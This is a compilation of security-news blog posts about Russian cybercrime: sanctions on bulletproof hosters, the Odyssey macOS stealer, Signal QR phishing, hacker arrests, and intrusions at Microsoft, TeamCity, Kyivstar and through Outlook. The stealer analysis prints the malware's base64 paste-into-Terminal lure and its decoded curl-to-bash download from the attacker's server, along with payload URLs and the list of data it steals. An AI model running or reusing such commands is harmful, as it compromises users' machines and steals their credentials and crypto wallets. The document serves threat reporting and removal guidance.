Based in sunny St. Petersburg, Russia, Media Land LLC has been running what the industry politely calls “bulletproof hosting” services. For those unfamiliar with the term, “bulletproof hosting” is essentially server infrastructure designed with one goal in mind: making it incredibly difficult for law enforcement to shut you down. Think of it as the cybercrime equivalent of a bunker—except instead of storing canned goods, you’re hosting ransomware operations.

According to the U.S. Treasury Department, Media Land has been the hosting provider of choice for some of the cybercrime world’s greatest hits, including LockBit, BlackSuit, and Play ransomware gangs. Their infrastructure has also been used to launch DDoS attacks against U.S. companies and critical infrastructure. In other words, if cybercrime were a movie, Media Land would be the studio lot where all the villains shoot their scenes.

The Man Behind the Curtain: “Yalishanda”

Running this digital criminal empire is Alexander Volosovik, known in underground forums by his rather whimsical alias “Yalishanda” (One has to wonder if that username was already taken when he tried “CyberCrimeBoss69”) Volosovik has been busy advertising his services on cybercriminal forums, providing servers, and troubleshooting for ransomware operators—basically running a twisted version of customer support. Notably, security researcher Brian Krebs investigated bulletproof hosting operations back in July 2019, highlighting how these services have long enabled cybercriminals to operate with impunity.

“Need a server that law enforcement can’t touch? Call Yalishanda! We’ve got you covered!” might as well have been his tagline.

Working alongside Volosovik are several accomplices, including Kirill Zatolokin, who handled payments and coordination (every criminal enterprise needs a good accountant), and Yulia Pankova, who managed Volosovik’s legal issues and finances. Because even cybercriminals have paperwork, apparently.

The Price Tag: £14.7 Billion and Counting

UK Foreign Secretary Yvette Cooper didn’t mince words when announcing the sanctions. Cyber-attacks cost British businesses a staggering £14.7 billion in 2024 alone—that’s 0.5% of the entire UK GDP. To put that in perspective, that’s roughly the GDP of a small country, just… evaporating into the digital void thanks to ransomware and other cyber nastiness.

Cooper’s statement painted a bleak but accurate picture: “Putin has turned Russia into a safe haven for these malicious cyber criminals, cultivating a dark criminal ecosystem with deep ties to the Kremlin.” Translation: Russia has become the Florida of cybercrime—a place where criminals retire and continue their work with impunity. This isn’t the first time we’ve seen Russia’s cybercrime ecosystem intersect with geopolitical conflicts, particularly in the context of the ongoing war in Ukraine.

Aeza Group: When Plan A Gets Sanctioned, Try Plan B (and C, and D…)

In a plot twist worthy of a spy novel, the sanctions also target Aeza Group LLC, another bulletproof hosting provider that was already sanctioned back in July 2025. But here’s where it gets interesting: instead of calling it quits, Aeza’s leadership decided to play a game of corporate whack-a-mole.

After the initial sanctions, Aeza initiated what the Treasury delicately calls “a rebranding strategy.” They created Hypercore Ltd. in the UK, established front companies in Serbia (Smart Digital Ideas DOO) and Uzbekistan (Datavice MCHJ), and appointed a new director, Maksim Makarov, to make key decisions about evading sanctions. Because apparently, when you’re already sanctioned for enabling cybercrime, the logical next step is… more crime.

The U.S. Treasury’s response? “Thanks for the org chart!” They’ve now sanctioned the entire network, including the new players.

What Does “Bulletproof” Even Mean?

For the uninitiated, bulletproof hosting providers offer specialized services designed to resist takedown attempts. This typically includes:

• Ignoring abuse complaints: That email saying “your server is hosting ransomware” goes straight to spam
• Hosting in jurisdictions with lax enforcement: Preferably where local authorities either can’t or won’t cooperate with international law enforcement
• Quick infrastructure migration: If one server gets seized, the operation moves to another faster than you can say “probable cause”
• Anonymized payment methods: Cryptocurrency preferred, questions discouraged

Media Land and Aeza Group weren’t just hosting websites—they were providing the entire infrastructure that allows cybercriminals to operate with something approaching impunity. It’s like renting out a getaway car, but the car can teleport to a different country if the police get too close.

The coordinated nature of these sanctions is particularly significant. When three major economies simultaneously slam the door on your operation, finding financial institutions willing to process your payments becomes… complicated.

Here’s the delicious irony: bulletproof hosting providers sell their services based on being untouchable. “We’re so secure, so hidden, so protected that authorities can’t touch us!” And yet, here we are, with detailed Treasury Department press releases listing names, aliases, corporate structures, and asset freezes.

Turns out “bulletproof” has its limits when three countries’ financial systems simultaneously decide you’re persona non grata.

The National Cyber Security Centre, along with its international counterparts, has released new guidance to help organizations defend against malicious activities enabled by bulletproof hosting providers. Because while sanctions can disrupt operations, education and defense are equally important.

Will this completely stop ransomware attacks? Of course not. Cybercrime is a multi-billion-dollar industry with plenty of entrepreneurs eager to fill any gaps in the market. But it does make life significantly harder for major operations, disrupts established infrastructure, and sends a clear message: the “bulletproof” promise comes with an expiration date.

The Bigger Picture

What makes this action particularly noteworthy is the coordination. Cybercrime is inherently international—attackers in Russia can target victims in the UK using infrastructure in a dozen different countries. Fighting it requires a similarly international response. We’ve seen similar coordinated efforts before, such as when international authorities successfully dismantled major Russian botnets, proving that collaboration can yield results.

The fact that the U.S., UK, and Australia managed to coordinate sanctions, share intelligence, and act simultaneously shows that when it comes to cybercrime infrastructure, the good guys are learning to play the same global game as the criminals.

As for Alexander “Yalishanda” Volosovik and his associates, they’re probably discovering that being on everyone’s sanctions list is decidedly bad for business. Even in Russia’s cybercrime-friendly ecosystem, being this toxic makes it hard to find banks willing to hold your money or partners willing to work with you. While Media Land focused on hosting ransomware infrastructure, other Russian cybercriminals have been involved in more direct attacks, showing the diverse nature of the threat landscape.

The post Media Land Sanctioned: US, UK, and Australia Crush Russian “Bulletproof” Hosting Empire appeared first on Gridinsoft Blog.

Analysis of the malware reveals intriguing geopolitical elements, with persistence mechanisms using file names like com.love.russia.plist and staging directories named lovemrtrump – suggesting potential connections to Russian threat actors with apparent political motivations. Most concerning is the malware’s ability to replace legitimate cryptocurrency applications like Ledger Live with trojaned versions, compromising hardware wallet security and stealing private keys during transactions.

The Deception Chain: From Fake Verification to Full Compromise

The attack begins when users are redirected to seemingly legitimate domains like macosx-apps[.]com (macosxappstore[.]com, appmacosx[.]com) displaying convincing Cloudflare-styled verification pages. These pages present users with an “Unusual Web Traffic Detected” warning and request manual verification through terminal commands.

The fake verification page instructs users to:

1. Press Command + Space to open Spotlight
2. Type “Terminal” and press Return
3. Copy and paste a provided command
4. Execute the command to “verify” their legitimacy

What appears to be a simple verification text is actually a base64-encoded malicious command: echo "Y3VybCAtcyBodHRwOi8vb2R5c3NleTEudG86MzMzMy9kP3U9b2N0b2JlciB8IG5vaHVwIGJhc2ggJg==" | base64 -d | bash

When decoded, this reveals the true payload: curl -s hxxp[:]//odyssey1[.]to:3333/d?u=october | nohup bash & – a command that downloads and executes an AppleScript stealer from the attacker’s server.

Advanced AppleScript Capabilities: Beyond Basic Info-Stealing

The Odyssey Stealer distinguishes itself through obfuscation and comprehensive data collection capabilities. The malware employs randomized function names (like f7220708984353234618 and v4763105019481279311) to evade signature-based detection while systematically harvesting sensitive information.

Targeted Data Collection

The stealer focuses on high-value targets across multiple categories:

• Browser Credentials: Targets Safari, Chrome, Brave, Edge, Vivaldi, Opera, and Firefox, extracting cookies, form history, and stored passwords
• Cryptocurrency Wallets: Specifically hunts for Electrum, Coinomi, Exodus, Ledger Live, MetaMask, and numerous other wallet applications
• System Information: Collects detailed hardware and software profiles using system_profiler
• Personal Files: Copies documents from Desktop and Documents folders with extensions like .txt, .pdf, .docx, .wallet, .key
• Keychain Access: Steals macOS Keychain databases containing stored passwords and certificates
• Apple Notes: Extracts and formats Notes data, potentially revealing personal information and security details

Persistence and Privilege Escalation

The malware establishes multiple persistence mechanisms to maintain long-term access:

• LaunchDaemon Installation: Creates /Library/LaunchDaemons/com.love.russia.plist to ensure automatic execution at boot
• Botnet Binary: Downloads and installs a secondary payload (~/.init) that runs continuously
• Social Engineering for Sudo: Prompts users with fake “Application Helper” dialogs to obtain administrator passwords
• Application Replacement: Can replace legitimate applications like Ledger Live with malicious versions

Technical Analysis: Obfuscation and Anti-Detection

The Odyssey Stealer demonstrates anti-analysis techniques that set it apart from typical commodity info-stealers like Lumma. Unlike traditional malware that relies on compiled binaries, this threat leverages AppleScript’s legitimate system access to fly under the radar.

Key Technical Features

Cryptocurrency Focus: The Primary Target

Like many modern stealers, Odyssey specifically targets cryptocurrency assets with precision similar to Meta Infostealer campaigns. The malware maintains an extensive list of over 180 browser extension IDs for cryptocurrency wallets and DeFi applications.

High-priority targets include:

• MetaMask: The most common Ethereum wallet extension
• BNB Chain Wallet: Binance Smart Chain access
• Hardware Wallet Interfaces: Ledger Live, Trezor Suite
• Desktop Wallets: Electrum, Exodus, Atomic Wallet
• Exchange Applications: Binance desktop, TonKeeper

The malware’s application replacement capability is particularly concerning. When enabled, it can download and install malicious versions of legitimate applications like Ledger Live, potentially compromising hardware wallet interactions and stealing private keys during transactions.

The Ledger Live Trojan: Hardware Wallet Compromise

One of the most dangerous features of Odyssey Stealer is its ability to replace the legitimate Ledger Live application with a malicious version. This supply-chain attack works by:

• Application Termination: Killing any running Ledger Live processes
• File Replacement: Removing the legitimate /Applications/Ledger Live.app
• Malicious Installation: Downloading and installing a trojaned version from hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
• Seamless Operation: The fake application appears identical to users while capturing private keys and transaction data

This attack vector is particularly insidious because users trust hardware wallets like Ledger devices for their enhanced security. However, if the companion software is compromised, attackers can potentially intercept private keys, seed phrases, and transaction details even from hardware-secured wallets. The trojaned Ledger Live app could capture sensitive information during device setup, firmware updates, or transaction signing processes.

Indicators of Compromise (IoCs)

Network Indicators

• C2 Server: odyssey1[.]to:3333
• Download URL: hxxp[:]//odyssey1[.]to:3333/d?u=october
• Fake Domain: macosx-apps[.]com, macosxappstore[.]com, appmacosx[.]com
• Asset Download: hxxp[:]//odyssey1[.]to/otherassets/ledger.zip
• Botnet Binary: hxxp[:]//odyssey1[.]to/otherassets/botnet

File System Artifacts

• Staging Directory: /tmp/lovemrtrump/
• Exfiltration Archive: /tmp/out.zip
• Persistence: /Library/LaunchDaemons/com.love.russia.plist
• User Files: ~/.username, ~/.pwd, ~/.init, ~/.start
• Data Collection: /tmp/lovemrtrump/finder/, /tmp/lovemrtrump/deskwallets/

Detection and Removal Guide

If you suspect your Mac has been compromised by Odyssey Stealer, immediate action is required to prevent ongoing data theft and financial losses.

Immediate Detection Steps

1. Check for Active Processes:

           ps aux | grep -E "(odyssey|lovemrtrump|\.init)"
           launchctl list | grep "com.love.russia"
           

2. Inspect File System:

           ls -la /tmp/lovemrtrump/
           ls -la /Library/LaunchDaemons/com.love.russia.plist
           ls -la ~/.init ~/.start ~/.username ~/.pwd
           

3. Check Network Connections:

           netstat -an | grep "odyssey1"
           lsof -i | grep 3333
           

Manual Removal Process

Warning: Manual removal requires administrative privileges and careful execution. For comprehensive cleanup, we recommend using professional security tools.

1. Stop Malicious Processes:

           sudo launchctl unload /Library/LaunchDaemons/com.love.russia.plist
           sudo pkill -f "\.init"
           sudo pkill -f "lovemrtrump"
           

2. Remove Persistence Mechanisms:

           sudo rm -f /Library/LaunchDaemons/com.love.russia.plist
           rm -f ~/.init ~/.start ~/.username ~/.pwd
           

3. Clean Temporary Files:

           sudo rm -rf /tmp/lovemrtrump/
           sudo rm -f /tmp/out.zip
           sudo rm -f /tmp/ledger.zip
           sudo rm -f /tmp/starter
           

4. Verify Application Integrity:

           # Check if Ledger Live was replaced
           ls -la "/Applications/Ledger Live.app"
           # Reinstall from official source if suspicious
           

Post-Infection Security Measures

After removing the malware, implement these critical security steps:

Immediate Actions

• Change All Passwords: Update passwords for all accounts, especially financial and cryptocurrency services
• Review Financial Accounts: Check bank statements, credit reports, and cryptocurrency wallet balances
• Enable 2FA: Activate two-factor authentication on all sensitive accounts
• Monitor Credit Reports: Set up fraud alerts with credit bureaus

Browser Security

• Clear Browser Data: Remove all saved passwords, cookies, and form data
• Reinstall Extensions: Remove and reinstall all browser extensions, especially wallet-related ones
• Update Browsers: Ensure all browsers are running the latest versions
• Review Permissions: Audit browser extension permissions and remove unnecessary access

Cryptocurrency Security

• Create New Wallets: Generate new wallet addresses and transfer funds from potentially compromised wallets
• Hardware Wallet Reset: If using hardware wallets, perform a full reset and restore from backup
• Verify Applications: Reinstall all cryptocurrency applications from official sources
• Monitor Transactions: Set up alerts for all cryptocurrency accounts and monitor for unauthorized activity

The Broader Threat Landscape

The Odyssey Stealer represents a concerning evolution in macOS-targeted cybercrime. Unlike previous campaigns that relied on social engineering or software vulnerabilities, this threat combines legitimate system tools with deception to bypass traditional security measures.

This attack shares characteristics with other recent campaigns targeting Mac users, including RustBucket malware and various cross-platform stealers. The trend toward AppleScript-based attacks suggests cybercriminals are adapting their tactics to exploit macOS users’ trust in system dialogs and terminal commands.

The campaign’s focus on cryptocurrency theft aligns with broader industry trends. As traditional banking security improves, attackers increasingly target decentralized finance (DeFi) platforms and personal cryptocurrency holdings, which often lack the same fraud protection mechanisms as traditional financial institutions.

Geopolitical Implications: The Russia Connection

The malware’s internal artifacts reveal potential geopolitical motivations. The persistence mechanism installs itself as com.love.russia.plist in the system’s LaunchDaemons directory, while staging stolen data in a folder named lovemrtrump. These naming conventions suggest the campaign may originate from Russian-affiliated threat actors with apparent political sentiments targeting Western cryptocurrency users.

The combination of Russian nomenclature and cryptocurrency theft capabilities aligns with patterns observed in other state-sponsored or politically motivated cybercrime operations. The specific targeting of hardware wallet applications like Ledger Live suggests a deep understanding of Western cryptocurrency infrastructure and user behavior patterns.

Conclusion

The Odyssey Stealer’s distinctive characteristics – from its Russian-themed persistence mechanisms (com.love.russia.plist, lovemrtrump directories) to its specific targeting of hardware wallet applications like Ledger Live – suggest a coordinated campaign with potential geopolitical motivations. The ability to replace legitimate cryptocurrency applications with trojaned versions represents a particularly dangerous evolution in crypto-targeted malware, as it undermines the security assumptions users make about hardware wallet safety.

Mac users must remain vigilant against these evolving threats, particularly those involving terminal commands or system-level access requests. The Ledger Live trojan functionality is especially concerning, as it targets users who have invested in hardware security solutions, potentially compromising their most secure cryptocurrency storage methods.

As cryptocurrency adoption continues to grow, we can expect similar campaigns targeting wallet applications and blockchain-related services. The key to protection lies in maintaining skepticism toward unsolicited security prompts, implementing comprehensive security measures, and regularly verifying the integrity of cryptocurrency applications. Users should always download applications directly from official sources and be suspicious of any unexpected application updates or reinstallation requests.

The Odyssey Stealer serves as a stark reminder that the intersection of geopolitics and cybercrime continues to evolve, with threat actors leveraging technical capabilities to target high-value cryptocurrency assets while potentially advancing broader political agendas.

The post Odyssey Stealer: Russian ‘Love Trump’ Malware Replaces Ledger Live Crypto Wallet App appeared first on Gridinsoft Blog.

Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger

Google’s Threat Intelligence Group discovered a fraudulent campaign targeting Signal users. Several Russia-aligned threat actors are actively targeting messenger accounts, used by individuals of interest to Russian intelligence services. This surge in activity appears to be driven by wartime demands to access sensitive communications, particularly within government and military circles.

In brief, attackers exploit Signal’s “linked devices” feature, tricking victims into scanning malicious QR codes that link their Signal accounts to adversary-controlled devices. This allows real-time message interception without needing full-device compromise. While Ukraine remains the primary target of these attacks, there are growing concerns that these tactics will be used globally.

Technical Details of Signal Linked Devices Hack

The attack method primarily exploits Signal’s “linked devices” feature, which is designed to allow users to connect additional devices to their account. Attackers generate malicious QR codes that, when scanned, add an adversary-controlled instance to the victim’s account. From that moment, messages are delivered to both the victim and the attacker simultaneously. This allows for persistent surveillance.

Russian-linked groups employ various phishing techniques to distribute these malicious QR codes. Some campaigns disguise them as legitimate Signal group invites. However, they redirect users to compromised URLs that execute the linking process.

For example, UNC5792, a threat actor tied to Russian intelligence, modifies legitimate Signal group invite pages by replacing the standard redirection code with a link that initiates device pairing. Instead of joining a group, victims unknowingly grant attackers access to their private messages.

Another group, UNC4221, has developed a specialized Signal phishing kit. It mimics official military applications, such as the Ukrainian Armed Forces’ Kropyva artillery guidance system. This kit either embeds malicious QR codes within phishing pages or redirects users to fake device-linking instructions. This is further increasing the likelihood of successful compromise.

Beyond QR code phishing, Russian cyber actors also employ malware to exfiltrate Signal database files from compromised Windows and Android devices. APT44 has deployed WAVESIGN, a Windows Batch script that extracts messages from Signal databases and uploads them via Rclone.

Meanwhile, malware like Infamous Chisel targets Android devices, searching for and exfiltrating Signal’s database files. Other groups, including Turla and UNC1151, have used PowerShell scripts and command-line utilities to steal Signal messages from compromised systems.

What’s Wrong With QR Codes?

Unfortunately, QR codes present several security risks, primarily due to their inherent opacity. Users cannot see where they lead until they are scanned. Attackers exploit this by replacing legitimate QR codes with malicious ones. They do this either physically (e.g., placing stickers over real codes) or digitally (e.g., swapping images in online resources). Users often scan and approve QR codes without scrutiny, making them an attractive attack vector.

Additionally, Signal and other messengers should enhance its security measures by adding more explicit warnings during the device-linking process. The average user is not well-versed in cybersecurity, and small friction points in the authentication process could prevent inadvertent compromises. A simple “Are you sure?” prompt is simply not enough. For example, users should be required to type “YES” in capital letters or perform additional verification steps to ensure they understand the implications of linking a new device.

How To Stay Safe

To avoid falling victim to such scams, always verify the source of a QR code before scanning it. If you are linking a device to Signal, ensure that you initiate the process yourself through the app’s official settings rather than scanning codes from external sources. Be particularly wary of QR codes received via messages, emails, or websites that claim to be from Signal or trusted contacts.

Ultimately, the best defense against these attacks is vigilance. Attackers rely on social engineering and user complacency to succeed. By fostering greater awareness and caution when scanning QR codes, users can significantly reduce their risk of compromise.

The post Signal Linked Devices Abused by Russian Intelligence appeared first on Gridinsoft Blog.

Wazawaka a.k.a Mikhail Pavlovich Matveev Arrested in Russia

At just 32 years old, Matveev faces trial in Kaliningrad, Russia. According to local reports, he is accused of creating sophisticated malicious software designed to encrypt sensitive data and files, allegedly to target organizations and demand ransom payments in exchange for decryption keys.

The Russian Ministry of Internal Affairs stated that investigators have gathered enough evidence, and the case, accompanied by a prosecutor-approved indictment, has been submitted to the Central District Court of Kaliningrad. This information was confirmed by RIA Novosti, Russian state-sponsored media, and several other social media sources.

Certain channels claim Wazawaka is currently out on bail after paying two fines and getting stripped of quite substantial part of his cryptocurrency savings. However, this statement does not have any solid evidence other than the words of the media on X/Twitter. Back in 2022, the U.S. government accused him of a selection of cyber-related crimes and put a reward of up to $10 million for information leading to Matveev’s capture.

Mikhail Matveev faces charges in the United States for his alleged use of LockBit, Hive and Babuk ransomware to target thousands of victims both domestically and internationally. Since at least 2020, Matveev and his accomplices have reportedly attacked law enforcement agencies, hospitals, schools, government entities, and private organizations worldwide.

On May 16, 2023, the U.S. Department of Justice (DoJ) linked three global ransomware campaigns to Matveev, estimating their demands at nearly $400 million, with victims paying up to $200 million in ransom.

Matveev reportedly attacked a New Jersey police department and other government structures while working as LockBit ransomware affiliate. Additionally, while affiliated to the Hive ransomware operation, he attacked a nonprofit behavioral healthcare organization also in New Jersey.

Why so much fuss around a hacker?

Wazawaka is not just a hacker, he is one of the most notorious threat actors from Russia. Along with LockBitSupp and Maksim Yakubets, he has become renowned because of his mugshot published on the FBI wanted list. Matveev also became a star of one of the Brian Krebs’ investigations, where he was successfully doxxed.

This extensive media coverage is accompanied by the bold social media presence of the hacker himself. He has an X/Twitter account to highlight his daily activities and even successful hacks. The guy even started releasing his own merchandise at some point, yet its success is doubtful.

For another part of the cybersecurity community, Mikhail Matveev is remembered by being a particularly principleless hacker, as he attacked hospitals and schools with ransomware. Doing so has become against the “code” of hacking groups back in the days, but this code could not bother him less.

The post Wazawaka Hacker Arrested in Kaliningrad, Russia appeared first on Gridinsoft Blog.

Microsoft Hacked, Source Code Leaked

In its K-8 filing to SEC, Microsoft claims the relation of the latest hack to the one that was uncovered in January 2024. A Russian threat actor known as Nobelium/Midnight Blizzard managed to hack into Microsoft systems. The hack happened around November, with hackers staying inside for until January. This eventually resulted in adversaries gaining access to the emails of executives and certain authentication tools. And it turns out that attackers managed to take away some of the authentication secrets even after being discovered.

In the latest attack, Midnight Blizzard used these leaked auth secrets to get into the Microsoft internal networks once again. The same K-8 filing discloses the facts of hackers getting access (or at least attempting to) using the said leaked keys. Among particular systems under attack are source code repositories and some of the internal systems. Microsoft warns that the unauthorized access may happen repeatedly in future, meaning that they do not know the exact scale of auth secrets leak.

One fortunate thing though is that customer-facing assets and their data was not compromised. And this is most likely true, as the previous attacks mainly concentrated on top-tier executives, who barely have access to customer data. And this is a big relief: the scale of consequent attacks due to the data leaked from Azure, Outlook or other cloud services could have been tremendous. Still, no excuses for such a large company to fall victim to hackers.

Who is Midnight Blizzard?

Nobelium/APT29/Fancy Bear or Midnight Blizzard, by the new Microsoft classification, is a Russian state-sponsored threat actor. It mainly aims at cyber espionage, being led by the Russian External Intelligence Agency (SVR). The group is known for picking loud targets for its attacks, particularly government agencies, military contractors and the like.

Microsoft became their point of interest back in 2022, when they managed to hack an auxiliary SSO system for Windows Server. 2023 though has become a year of a “proper” hack. Back in November 2023, APT29 managed to stay in the network for quite some time, compromising a lot of different internal systems. Considering the uncertainity regarding the amount of compromised elements, they will certainly repeat.

The post Microsoft is Hacked, Again by Midnight Blizzard appeared first on Gridinsoft Blog.

TeamCity Vulnerability Exploited by CozyBear

JetBrains TeamCity servers, a crucial solution in the software development lifecycle, have recently been targeted in a cyberattack similar to the infamous SolarWinds hack. The Russian Foreign Intelligence Service (SVR)-backed group CozyBear exploited a severe vulnerability in these servers, tracked as CVE-2023-42793. This vulnerability allowed unauthorized attackers to bypass security measures and execute code remotely without user interaction. As a result, this poses a significant risk to over 30,000 JetBrains customers globally.

The aforementioned exploit was discovered in September and has been used to compromise an extensive array of companies and over a hundred devices worldwide, affecting organizations in the United States, Europe, Asia, and Australia. The victims come from various sectors, from billing and finance to gaming and medical devices. The widespread impact underlines the critical nature of the flaw and the tactics employed by CozyBear, previously known for the SolarWinds supply chain attack in 2020.

CozyBear Tactics and Techniques

CozyBear used various tactics and techniques around Mimikatz in the cyberattack on JetBrains TeamCity servers. This is a well-known tool for extracting credentials from the Windows Registry. It helped them steal information and escalate their access privileges within the compromised systems. CozyBear gained more profound and extensive control over the affected systems by elevating their access rights.

To further enhance their stealth and efficacy, CozyBear deployed the GraphicalProton backdoor. This backdoor uses standard cloud storage services such as OneDrive and Dropbox for command-and-control operations. Specifically, he used a randomly generated BMP file to save the information. This allowed CozyBear to mask its malicious communications amidst regular traffic, significantly reducing the likelihood of detection.

Another SolarWinds Attack?

The SolarWinds attack in 2020 was due to the company’s credentials being publicly available on GitHub. Cybersecurity researcher Vinoth Kumar discovered in 2018 that SolarWinds’ update server credentials were openly accessible on their GitHub repository. However, no one seems to be paying attention then. The attack compromised high-profile targets and affected about 18,000 SolarWinds clients.

In addition, prompt action is crucial in responding to security lapses. Overall, the SolarWinds attack underscores cybersecurity’s ongoing and evolving challenge in a highly interconnected digital world, where vigilance and proactive defense are essential. However, the reality we are seeing today suggests otherwise.

Mitigation and Response

JetBrains has released a patch to address security issues and recommends applying it immediately to reduce risks. The fixes are included in TeamCity servers version 2023.05.4 or later. Despite these efforts, Shadowserver reports show that about 800 instances worldwide still have not been patched, with over 230 located in the United States. It looks like a flash mob of ignoring installing updates and subsequent asspain is becoming a trend.

The post JetBrains Vulnerability Exploited by CozyBear Hackers appeared first on Gridinsoft Blog.

I considered delaying writing this post to gather more facts regarding the situation. On day 1, nothing but speculation and suppositions were available. Today, some of the facts appear, allowing me to make a comprehensive analysis of the case.

Ukrainian Mobile Operator Kyivstar Hacked by Russians

Early on December 12, Kyivstar services stopped working. As the company operates not only in the cell carrier segment, but also provides home Internet and connectivity services for businesses, these were down as well. The “national roaming” option, that allows switching between operators with certain limitations, was unresponsive, meaning that the network structure is severely disrupted.

At around 12:00, the first official comments from the company appeared. They claimed a cyberattack disrupting their services, and told about a rather long recovery process ahead. Further statements specified that the estimated time of major services recovery is not earlier than on December 13.

Until the evening of the same day, the details were lean. Some analysts tried to make conclusions, though they were at best blurred. Certain sources of information also supposed that Kyivstar suffered outages due to the DDoS attack, but that was likely just a confusion due to the simultaneous launch of a DDoS attack on one of Ukrainian banks. Meanwhile, the company succeeded with recovering part of its services, particularly the home Internet service to the end of the day.

On the morning of December 13, 2023, some facts and even more rumors began to surface. Among the latter, the brightest was the responsibility claim from a previously unknown Solntsepek threat actor. The gang published their statement along with the screenshots of what they claim to be insight into the hacked network. Nonetheless, I heavily doubt credibility of both claims and screenshots, since no one heard of the group before, and no identifiable details are present on those pictures.

Unpredicted outcomes

As Kyivstar is the biggest cellular operator in Ukraine, the outage caused obvious troubles for over 24 million users. Considering the population of the country is around 40 million in total, the outage touched every second citizen to a certain extent. That obviously uncovered how hard people are dependent on technology nowadays, but some of the issues caused by the Kyivstar hack were not that clear.

For instance, the air raid alarms – a heavily needed thing in a belligerent country – were reliant on the Kyivstar’s cell network. As a result, numerous cities across the country did not hear air raid alarms, and even online air raid maps were not able to work properly. That is especially unfortunate as rocket and UAV strikes happen on a daily basis.

What is less unfortunate for Ukraine though is that Russian troops who reside in the occupied areas of Kherson and Zaporizhzhia regions experienced cell coverage issues as well. Since invaders used stolen SIM cards of Ukrainian operators, their phones stopped working once the attack happened. Pay day for stolen SIM-cards, one may say.

Kyivstar Hack – Who is Responsible?

Well, all symptoms aside, let’s think of what exactly happened and figure out who is responsible for the hack. The character of destruction and the way the recovery goes supposes that hackers managed to establish persistence in the majority of infrastructural elements of the corporate network. Further, they destroyed all they could reach. That was not just a “DROP DATABASE”, as someone supposed before – in that case the recovery would not take that much time. Moreover, Kyivstar themselves claim that they are forced into recovering the network “piece by piece”.

The executor is, most likely, one of Russian APT groups. Sure enough, there is no confirmation, but there is no one to hack Ukrainian companies for pure vandalism except for Russians. Even though I doubt the claims of a no-name hack group, the nationality of hackers is almost certain.

Another edge of responsibility lies on the Kyivstar itself. Having such a large number of users creates significant responsibility, not only in the matter of service availability, but also data safety. Addresses, passport info, phone numbers, emails – all this was successfully leaked. Bad luck for a country in peacetime, culpable negligence for a country at war.

If the screenshots shared by the Solntsepek group are real, things can be much worse. An analyst under the nickname of Sean Townsend shares his thoughts regarding what the pics say. Spoiler – things may be extremely bad, and the security was non-existent at all.

Update 12/13 (21:00 GMT)

Olexandr Komarov, CEO of Kyivstar, uncovered some of the details regarding the beginning of the hack. The initial access was gained through a compromised account of an employee.

Are Other Companies in Danger?

What is the conclusion from such a situation? This is what all Ukrainian companies should be ready to counteract. And not only Ukrainian – Russian hackers are now naught on limitations in attacks on countries “rival” to Russia. Since hackers aim only for vandalism and do not try to monetize their job, the effects may be rapid and irreversible. A sturdy, well-engineered security system should be mandatory for all companies.

The post Kyivstar, Ukraine’s Biggest Cell Carrier, Hacked appeared first on Gridinsoft Blog.

Microsoft Outlook Vulnerability Used by Kremlin-Backed Hackers

Being a privilege escalation bug, CVE-2023-23397 received almost the highest CVSS score of 9.8. The rating was set back in March 2023, when the vulnerability was originally uncovered. And well, the flow of attacks commenced with this vulnerability exploitation confirms every bit of this score.

By its essence, the vulnerability consists of the ability to leak the Net-NTLMv2 hash by sending a specially-crafted email message. It is possible due to the features of the specific transfer format Microsoft uses in the Outlook. Through playing with the PidLidReminderFileParameter settings, adversaries can leak the hash and send it to its command server. That’s it for this exploit, but the main course of actions happens afterwards.

Forest Blizzard Exploits MS Outlook in Attacks on Poland

Microsoft researchers noticed one main threat actor using the CVE-2023-23397 in its cyberattacks – Forest Blizzard a.k.a. APT28/Fancy Bear. This threat actor has a proven connection to the Russian government, particularly to the Main Intelligence Directorate (GRU). In the campaign that exploited the described Outlook vulnerability, hackers primarily targeted Poland.

Upon receiving the Net-NTLMv2 hash, adversaries were able to manipulate the access permissions to specific mailbox folders. This, in turn, ended up with the ability to read all of the contents. Hackers specifically aimed at ones that could store any valuable and potentially sensitive information.

Such a targeting is rather obvious – Poland has had its relations with Russia ruined since February 2023. And its participation in supplies delivery to Ukraine is a point of interest for Russian intelligence. While such espionage bears on the same tactics as cybercriminals use in attacks on corporations, the final target is what is different. Though, nothing stops hackers from applying the same tactics in attacks on other countries.

Install the Patch, Microsoft Insists

As I have mentioned at the beginning, the patch for the CVE-2023-23397 was available all the way back in March 2023. Microsoft released it almost immediately after disclosing it. And since it is a vulnerability in the protocol, there is not much you can do to temporarily mitigate the issue. Even though it may be troublesome to update all the instances soon after the patch, it was plenty of time to arrange the update.

The post Outlook Vulnerability Exploited by Russian Hackers appeared first on Gridinsoft Blog.

The US Federal Bureau of Investigation on Tuesday reported the disruption of a massive spying program by the Russian Federal Security Service (FSB) using cyberspyware codenamed “Snake”.

This is stated in a press release from the US Department of Justice.

Let me remind you that we also talked about the fact that Europe’s largest private hospital operator Fresenius was attacked with an eponymous Snake ransomware. Don’t be confused – now we talk about a completely different malware.

US law enforcers believe that the spy tool was used by the hacker unit of the 16th FSB center, codenamed “Turla” for almost 20 years. We also reported that Fake DDoS App from Turla Targets Pro-Ukrainian Hacktivists.

The Snake program was designed to steal confidential documents from hundreds of computer systems in at least 50 countries that belonged to the governments of NATO member countries, in particular the United States, as well as journalists and other persons of interest to the Russian Federation.

To eliminate the “Snake”, the FBI developed an operation code-named “Medusa“. Within its framework, the spy application was forced to rewrite its own code, which disabled it. A senior FBI official said the Bureau’s tool was only designed to communicate with Russian spyware.

At a briefing ahead of the announcement, a US official involved in the operation called the Snake the “prime tool” of Russia’s cyber-espionage, Reuters reported.He expressed the hope that as a result of the liquidation of the program, Moscow could be “eradicated from the virtual battlefield.”

The media also reported that the FBI and NSA discovered Drovorub malware, created by Russian Intelligence services.

The post The FBI Disrupted the Cyberspyware “Snake” that the Russian FSB Used for 20 Years appeared first on Gridinsoft Blog.

In May, the racketeer-bargaining specialist (the negotiator) at a European production company had received an unexpected chat message from a malefactor who had hacked the specialist’s client.

Ransom negotiations, aimed at lowering the demands of racketeers, are the realm totally dominated by lawyers, consulting, and information security companies who know the nuts and bolts of working with hacker groups. The Palo Alto Networks Research shows that ransoms in 2021 grew to $2.2 million, becoming twice larger compared to the previous year. Palo Alto Networks state that the victims usually pay less than half of the initial ransom amount (around $541 000.)

The negotiator has shared this information on conditions of anonymity since he is not at liberty to discuss details of his work. The specialist’s job is to soften the demands of the extortionists.

“We need to know that you are honest with us,” – said the criminals, demanding a copy of the expert’s contract with the victims as proof of the legality of the specialist’s work after getting startled and nervous during the conversation.

The expert said that the crooks feared he would get an additional sum of money taken from the ransom amount.

